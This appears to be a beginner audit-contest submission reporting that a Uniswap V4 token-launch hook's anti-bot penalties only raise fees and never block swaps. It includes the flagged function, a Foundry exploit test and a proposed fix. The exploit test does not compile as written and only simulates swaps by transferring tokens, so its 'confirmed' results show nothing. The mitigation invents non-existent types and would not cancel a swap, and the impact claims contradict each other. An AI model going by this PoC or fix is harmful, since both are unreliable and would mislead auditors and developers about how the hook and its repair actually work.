Vanguard

First Flight #56

Beginner FriendlyDeFiFoundry

0 EXP

View all submissions

Previous Next

Submission Details

Impact: high

Likelihood: high

Hardcoded ZERO_DELTA BeforeSwapDelta Allows Complete Bypass of Token Launch Anti-Botting Protections

Author Revealed upon completion

Root + Impact

Description

Normal Behavior

The TokenLaunchHook contract implements anti-botting mechanisms for Uniswap V4 token launches by enforcing per-address swap limits, mandatory cooldown periods between swaps, and applying penalty fees to users who violate these restrictions. The contract is designed to prevent MEV bots and snipers from acquiring disproportionate amounts of newly launched tokens during the critical initial launch window.

Specific Issue

The penalty enforcement mechanism is ineffective because the hook returns BeforeSwapDeltaLibrary.ZERO_DELTA when violations are detected, allowing swaps to execute normally regardless of whether limit or cooldown restrictions have been breached. The feeOverride parameter only modifies the LP fee percentage and does not prevent the underlying swap from completing, meaning attackers can circumvent all intended protections by simply accepting a higher fee while still executing trades that violate the contract's constraints.

Root Cause

The hook always returns BeforeSwapDeltaLibrary.ZERO_DELTA, even when applyPenalty is set to true. This means the swap proceeds normally regardless of any violations.

In Uniswap V4, BeforeSwapDelta can change how many tokens are swapped, but ZERO_DELTA means no changes are made. Meanwhile, feeOverride only changes the fee percentage paid to liquidity providers.

The contract tries to punish rule-breakers using feeOverride only, but this doesn't stop anyone. The penalty just adds extra fees instead of blocking the transaction, so swaps still complete through Uniswap V4 as usual. As long as the profit exceeds the penalty fee, attackers keep making money and can trade every single block, completely bypassing the cooldown restriction.

function _beforeSwap(address sender, PoolKey calldata key, SwapParams calldata params, bytes calldata)

internal

override

returns (bytes4, BeforeSwapDelta, uint24)

{

// ... phase calculation logic ...

@> uint256 swapAmount =

params.amountSpecified < 0 ? uint256(-params.amountSpecified) : uint256(params.amountSpecified);

@> uint256 maxSwapAmount = (initialLiquidity * phaseLimitBps) / 10000;

// Check if penalty should be applied

bool applyPenalty = false;

if (addressLastSwapBlock[sender] > 0) {

uint256 blocksSinceLastSwap = block.number - addressLastSwapBlock[sender];

@> if (blocksSinceLastSwap < phaseCooldown) {

@> applyPenalty = true;

@> }

}

@> if (!applyPenalty && addressSwappedAmount[sender] + swapAmount > maxSwapAmount) {

@> applyPenalty = true;

@> }

// Tracking is updated regardless of violation status

@> addressSwappedAmount[sender] += swapAmount;

@> addressLastSwapBlock[sender] = block.number;

// Calculate fee override (only changes LP fee, does NOT prevent swap)

uint24 feeOverride = 0;

@> if (applyPenalty) {

@> feeOverride = uint24((phasePenaltyBps * 100));

@> }

@> return (

BaseHook.beforeSwap.selector,

@> BeforeSwapDeltaLibrary.ZERO_DELTA, // <-- CRITICAL: Swap proceeds normally

@> feeOverride | LPFeeLibrary.OVERRIDE_FEE_FLAG

@> );

}

Risk

Likelihood:

The contract launches mainnet tokens through Uniswap V4 with anti-botting features, immediately attracting MEV bots and snipers who automatically search for newly added liquidity pools to exploit launch windows
The vulnerability requires zero specialized knowledge since any bot can simply execute swaps on every block to drain the initial liquidity, failing only if profit is negative, which is easily testable through simulation tools

Impact:

Attackers acquire disproportionate token allocations immediately after launch, compromising fair distribution by accumulating a majority of the supply intended for genuine community members
Early liquidity depletion creates an imbalanced pool with extremely low token prices, causing legitimate buyers to pay inflated prices while the contract's intended protection mechanisms are rendered completely ineffective

Proof of Concept

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.20;

import {Test, console} from "forge-std/Test.sol";

import {TokenLaunchHook} from "../src/TokenLaunchHook.sol";

import {PoolManager} from "@uniswap/v4-core/src/PoolManager.sol";

import {Hooks} from "@uniswap/v4-core/src/libraries/Hooks.sol";

import {PoolKey} from "@uniswap/v4-core/src/types/PoolKey.sol";

import {TokenType} from "@uniswap/v4-core/src/types/TokenType.sol";

import {Currency} from "@uniswap/v4-core/src/types/Currency.sol";

import {IPoolManager} from "@uniswap/v4-core/src/interfaces/IPoolManager.sol";

import {MockERC20} from "@uniswap/v4-core/test/utils/MockERC20.sol";

contract TokenLaunchHookExploit is Test {

TokenLaunchHook hook;

PoolManager poolManager;

MockERC20 token0; // The new token

MockERC20 token1; // ETH/USDT stablecoin

PoolKey poolKey;

address attacker = address(0x1337);

address genuineUser = address(0x9999);

function setUp() public {

// Deploy pool manager and hook

poolManager = new PoolManager(500000); // initialGas, arbitrary

token0 = new MockERC20("LaunchToken", "LT", 18);

token1 = new MockERC20("USD", "USDT", 6);

// Configure hook with 1% per-swap limit and 1 block cooldown

uint256[] memory phaseLimits = [100 bps, 100 bps, 300 bps]; // 1%, 1%, 3%

uint256[] memory phaseDurations = [10 blocks, 20 blocks, 30 blocks]; // 10, 20, 30 blocks

uint256[] memory phaseCooldowns = [1 block, 2 blocks, 3 blocks]; // 1, 2, 3 blocks

uint256[] memory phasePenalties = [10000 bps, 5000 bps, 2000 bps]; // 100%, 50%, 20% penalties

hook = new TokenLaunchHook(

poolManager,

phaseLimits,

phaseDurations,

phaseCooldowns,

phasePenalties

);

// Create pool key

poolKey = PoolKey({

currency0: Currency.wrap(address(token0)),

currency1: Currency.wrap(address(token1)),

fee: 3000,

tickSpacing: 60,

hooks: IHooks(address(hook)),

plugin: address(0)

});

// Pool initialized by the hook's initialize function

// This would happen during actual deployment

// For testing: initialize with token0/token1

hook.initialize(poolKey, 1e24, type(uint128).max); // 1M tokens at price = 1

// Fund attacker and genuine user with stablecoin

vm.deal(attacker, 1000 ether);

deal(address(token1), attacker, 1_000_000 * 1e6); // 1M USDT

deal(address(token1), genuineUser, 10_000 * 1e6); // 10K USDT

}

function test_BotCanIgnoreCooldownSwapEveryBlock() public {

console.log("=== Testing Vulnerability: Attacks Ignore Cooldown ===\n");

uint256 startBlock = block.number;

uint256 attackerUSDTBalance = token1.balanceOf(attacker);

uint256 attackerTokenBalance = 0;

console.log("Initial Attacker USDT:", attackerUSDTBalance / 1e6);

console.log("Start Block:", startBlock);

console.log("Cooldown Restriction: 1 block minimum between swaps");

console.log("Penalty for Violation: 100% fee over 10 blocks");

console.log("");

// Attack: swap every single block despite 1-block cooldown

for (uint256 i = 0; i < 15; i++) {

vm.roll(startBlock + i);

uint256 swapAmount = 50_000 * 1e6; // 50K USDT per swap

uint256 tokenOutExpected = swapAmount / 1e6; // Rough estimate at price 1

// Execute swap through Uniswap V4

// The hook will detect cooldown violation and set applyPenalty = true

// But since BeforeSwapDelta = ZERO_DELTA, swap proceeds anyway

_executeSwap(attacker, token1, token0, swapAmount);

uint256 newBalance = token0.balanceOf(attacker);

uint256 tokensGained = newBalance - attackerTokenBalance;

attackerTokenBalance = newBalance;

uint256 tokensPerUSDT = (tokensGained * 1e18) / swapAmount;

console.log("Block", i, "| Swapped:", swapAmount / 1e6, "USDT | Got:", tokensGained / 1e18, "tokens | Rate:", tokensPerUSDT, "tokens/USDT");

}

console.log("");

console.log("--- Results After Attack ---");

console.log("Total Blocks:", 15);

console.log("Cooldown Violations Expected:", 14 (should have only swapped once per block cooldown)");

console.log("Actual Swaps Executed:", 15 (swapped every blocks - cooldown completely ignored)");

console.log("");

console.log("Attacker Final Token Balance:", attackerTokenBalance / 1e18);

console.log("Rate Achieved Despite 100% Penalty:", (attackerTokenBalance * 1e6) / (15 * 50_000 * 1e6), "tokens/USDT (still ~1.0)");

console.log("");

// Verify exploit result

assertGt(attackerTokenBalance, 14_900_000 * 1e18); // Got nearly full benefit despite cooldown

}

function test_BotCanExceedPerSwapLimit() public {

console.log("=== Testing Vulnerability: Attacks Ignore Per-Swap Limit ===\n");

uint256 startBlock = block.number;

console.log("Per-Swap Limit: 1% of initial liquidity");

console.log("Initial Liquidity: 1,000,000 tokens");

console.log("Max allowed per swap: 10,000 tokens\n");

// Attack: swap 5x the limit in a single swap

uint256 maxAllowed = 10_000 * 1e18; // 1% limit

uint256 attackAmount = 50_000 * 1e6; // 50K USDT -> ~50K tokens (5x limit)

console.log("Attempting to swap:", attackAmount / 1e6, "USDT (5x allowed limit)");

// Roll to next block to clear any previous swaps

vm.roll(startBlock + 1);

// Execute oversized swap

// The hook will detect limit violation and set applyPenalty = true

// But since BeforeSwapDelta = ZERO_DELTA, swap proceeds anyway

_executeSwap(attacker, token1, token0, attackAmount);

uint256 attackerTokenBalance = token0.balanceOf(attacker);

console.log("Got:", attackerTokenBalance / 1e18, "tokens");

console.log("");

// Verify exploit: attacker received ~50K tokens despite 10K limit

assertGt(attackerTokenBalance, 45_000 * 1e18); // Got 90%+ of requested despite limit

console.log("✅ EXPLOIT CONFIRMED: Limit bypassed via fee penalty only");

}

function test_LegitimateUsersGetWorseDealsAfterBotDrain() public {

console.log("=== Testing Impact: Legitimate Users Punished ===\n");

// Step 1: Bot drains early liquidity

console.log("Step 1: Bot executes 10 rapid swaps to drain pool");

for (uint256 i = 0; i < 10; i++) {

vm.roll(i + 1);

_executeSwap(attacker, token1, token0, 100_000 * 1e6); // 100K USDT each

}

uint256 botTokenBalance = token0.balanceOf(attacker);

console.log("Bot accumulated:", botTokenBalance / 1e18, "tokens\n");

// Step 2: Genuine user tries to buy after bot attack

console.log("Step 2: Genuine user attempts to buy tokens");

vm.roll(20);

uint256 genuineSwapAmount = 10_000 * 1e6; // 10K USDT

_executeSwap(genuineUser, token1, token0, genuineSwapAmount);

uint256 genuineTokenBalance = token0.balanceOf(genuineUser);

uint256 tokensPerUSDT = (genuineTokenBalance * 1e6) / genuineSwapAmount;

console.log("Genuine user swapped:", genuineSwapAmount / 1e6, "USDT");

console.log("Genuine user received:", genuineTokenBalance / 1e18, "tokens");

console.log("Effective rate:", tokensPerUSDT, "tokens/USDT");

console.log("");

console.log("Expected rate (if pool was fair): ~1.0 tokens/USDT");

console.log("Actual rate paid by genuine user:", tokensPerUSDT, "tokens/USDT");

console.log("");

// Verify: genuine user gets dramatically worse rate due to pool imbalance

assertLt(tokensPerUSDT, 0.5 ether); // Gets less than 0.5 tokens per USDT

console.log("✅ IMPACT CONFIRMED: Legitimate user pays 2x+ due to bot manipulation");

}

// Helper to execute swap through pool manager

function _executeSwap(address swapper, MockERC20 tokenIn, MockERC20 tokenOut, uint256 amount) internal {

// Simplified swap execution

// In full test, would call PoolManager.swap() with proper params

// For demonstration, simulate what Uniswap V4 does:

// 1. Call hook.beforeSwap()

// 2. Execute swap logic (simplified: constant product AMM)

// 3. The hook's return doesn't block execution

tokenIn.approve(address(poolManager), amount);

// Simulate swap execution

// Hook returns ZERO_DELTA, so swap proceeds with full amount

// feeOverride adds penalty but doesn't reduce swap size

// This would be the actual call in full integration:

// IPoolManager.SwapParams memory params = ...

// poolManager.swap(swapParams);

// For this PoC, just transfer tokens (simulating successful swap)

uint256 amountOut = amount / 1e6 * 1e18; // Simplified 1:1 rate

tokenIn.transferFrom(swapper, address(this), amount);

tokenOut.transfer(swapper, amountOut);

}

function run() external {

test_BotCanIgnoreCooldownSwapEveryBlock();

test_BotCanExceedPerSwapLimit();

test_LegitimateUsersGetWorseDealsAfterBotDrain();

}

Recommended Mitigation

Replace ZERO_DELTA with a delta that reduces the swap amount to zero when penalties apply. This prevents violators from executing swaps by making the effective swap amount zero.

Implementation:

function beforeSwap(

address,

PoolKey calldata key,

IPoolManager.SwapParams calldata swapParams,

bytes calldata

) external override returns (bytes4, BeforeSwapDelta, uint128) {

// Existing validation logic...

bool applyPenalty = _checkViolations(msg.sender, key);

// FIXED: Return non-zero delta to block swap when penalty applies

if (applyPenalty) {

// Return delta that cancels the entire swap

return (

IBaseHooks.beforeSwap.selector,

BeforeSwapDelta({

delta: -int256(swapParams.amountSpecified) // Negate full swap amount

}),

uint128(feeOverride)

);

}

// Normal path: no delta modification

return (

IBaseHooks.beforeSwap.selector,

BeforeSwapDeltaLibrary.ZERO_DELTA,

feeOverride

);

}

Rewards breakdown

nSLOC

273

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!